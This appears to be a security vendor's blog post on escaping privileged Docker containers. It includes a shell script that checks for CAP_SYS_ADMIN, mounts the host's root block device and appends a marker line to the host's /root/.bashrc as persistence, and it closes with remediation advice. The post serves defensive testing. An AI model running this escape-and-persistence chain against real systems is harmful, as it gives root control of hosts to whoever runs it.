Is my Docker container vulnerable to host filesystem mounting?

Containers that can mount the host filesystem may be vulnerable to a container escape. This chain attempts to mount the host filesystem, identify the host's root directory, and establish persistence. Containers must not be able to mount the host filesystem: an adversary who can do so may establish persistence by modifying files on the mounted host filesystem, elevate privileges, and escape the container.
This week, we are releasing a Docker container escape TTP:
  • Is my Docker container vulnerable to host filesystem mounting?

Is my Docker container vulnerable to host filesystem mounting?

For this week's TTP Tuesday, we're providing a Docker container escape. This TTP demonstrates how to escape from a Docker container that can mount the host filesystem. A container started in privileged mode receives every Linux capability (including CAP_SYS_ADMIN, which mount(2) requires), sees the host's block devices under /dev, and runs without Docker's default seccomp and AppArmor profiles. Because Docker does not remap user IDs by default, UID 0 inside such a container is UID 0 on the host, so root in the container can mount the host's root filesystem and then read, write, and execute files on the host as root.

The issue affects any Docker container running with the --privileged flag. Note that this is not a vulnerability in Docker code, but rather a common security misconfiguration of the Docker container.

Testing

Execute Operator's Is my Docker container vulnerable to host filesystem mounting? TTP on each Docker container in your environment to test if you are vulnerable.

The TTP first checks whether the agent is running within a privileged Docker container. Next, it checks whether the host filesystem can be mounted. Finally, it attempts to establish persistence on the host by modifying a Unix shell configuration file on the mounted host filesystem.
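The three checks the TTP performs, written out as plain POSIX shell so they can be read and tried by hand inside a container. This is an added example, not the Operator TTP's own code. The list of candidate block devices, the /mnt/host mount point, and the host's /root/.bashrc as the persistence target are assumptions, and the appended line is a harmless marker comment standing in for whatever command an adversary would plant.

```shell
#!/bin/sh
# Added example (not Prelude's TTP code): the privileged-container check,
# the host filesystem mount, and the shell-config persistence step.
# Assumptions: the host root lives on one of CANDIDATE_DEVICES, we mount it
# at /mnt/host, and persistence is a line appended to the host's /root/.bashrc.

CAP_SYS_ADMIN_BIT=21        # mount(2) needs CAP_SYS_ADMIN (capability number 21)
HOST_MNT=/mnt/host
CANDIDATE_DEVICES='/dev/sda1 /dev/sda2 /dev/vda1 /dev/vda2 /dev/xvda1 /dev/nvme0n1p1 /dev/nvme0n1p2'

# Step 1: is this a privileged container? Takes the hex CapEff mask from
# /proc/self/status as an argument so it can be checked against known values.
# A default Docker container has CapEff 00000000a80425fb (14 capabilities, no
# CAP_SYS_ADMIN); a privileged one has every bit set, e.g. 0000003fffffffff on
# kernels before 5.8 or 000001ffffffffff on 5.8 and later.
has_cap_sys_admin() {
    mask="$1"
    [ -n "$mask" ] || return 1
    [ $(( (0x$mask >> CAP_SYS_ADMIN_BIT) & 1 )) -eq 1 ]
}

current_capeff() {
    awk '/^CapEff:/ {print $2}' /proc/self/status
}

# "Identify a root directory": a mounted filesystem counts as the host root if
# it carries etc/passwd and a root/ home directory. Kept separate so the
# heuristic can be exercised against any directory tree.
looks_like_host_root() {
    [ -d "$1/etc" ] && [ -d "$1/root" ] && [ -f "$1/etc/passwd" ]
}

# Step 2: can the host filesystem be mounted? Block devices under /dev are only
# visible in a privileged container, so the -b test fails in a default one.
# Prints the device that mounted as host root; returns 1 if none did.
mount_host_root() {
    mkdir -p "$HOST_MNT"
    for dev in $CANDIDATE_DEVICES; do
        [ -b "$dev" ] || continue
        if mount "$dev" "$HOST_MNT" 2>/dev/null; then
            if looks_like_host_root "$HOST_MNT"; then
                echo "$dev"
                return 0
            fi
            umount "$HOST_MNT"
        fi
    done
    return 1
}

# Step 3: persistence via Unix shell configuration modification. $1 is the
# mounted host root, $2 the line to append to root's .bashrc. The line is only
# added once so repeated runs do not stack entries.
add_bashrc_persistence() {
    rc="$1/root/.bashrc"
    line="$2"
    grep -qxF -- "$line" "$rc" 2>/dev/null && return 0
    printf '%s\n' "$line" >> "$rc"
}

main() {
    capeff=$(current_capeff)
    if ! has_cap_sys_admin "$capeff"; then
        echo "CapEff=$capeff: no CAP_SYS_ADMIN, not a privileged container"
        return 0
    fi
    if ! dev=$(mount_host_root); then
        echo "privileged, but no host root filesystem found on: $CANDIDATE_DEVICES"
        return 0
    fi
    echo "host root from $dev mounted at $HOST_MNT"
    add_bashrc_persistence "$HOST_MNT" '# ttp-marker: shell config modified from a container'
    echo "marker line written to $HOST_MNT/root/.bashrc"
}

# Only act when explicitly asked; sourcing the file just defines the functions.
if [ "${1:-}" = "--run" ]; then
    main
fi
```

Run it as `sh check.sh --run` inside the container under test. In a default (unprivileged) container the first step stops on the CapEff mask 00000000a80425fb, which lacks bit 21, and the /dev/sd* and /dev/vd* nodes it would try are not present anyway; in a privileged container it mounts the first device that looks like a root filesystem and appends the marker line to the host's /root/.bashrc, which is exactly the artifact defenders should look for after running the TTP.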

Remediation

The recommended remediation is to not run Docker containers in privileged mode. If a workload needs one specific capability or device, grant that alone with --cap-add or --device rather than --privileged. From the host, the setting is visible as HostConfig.Privileged in docker inspect output, so it can be audited across running containers.

Check out the TTP Is my Docker container vulnerable to host filesystem mounting? on the Prelude chains website.

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!

There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.prelude.org/download/current

See the latest kill chain and TTP Releases: https://chains.prelude.org

See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu

Reddit: https://www.reddit.com/r/preludeorg/

Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg

Read our blog: https://feed.prelude.org

Watch our live streams: https://www.twitch.tv/preludeorg

Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: https://twitter.com/privateducky

Alex: https://twitter.com/khyberspache

Octavia: https://twitter.com/VVX7

Waseem: https://twitter.com/gerbsec

Source: https://feed.prelude.org
TTPs

  • Is this Docker container running in privileged mode?
  • Is my Docker container vulnerable to host filesystem mounting?
  • Persistence via mounted Unix shell configuration modification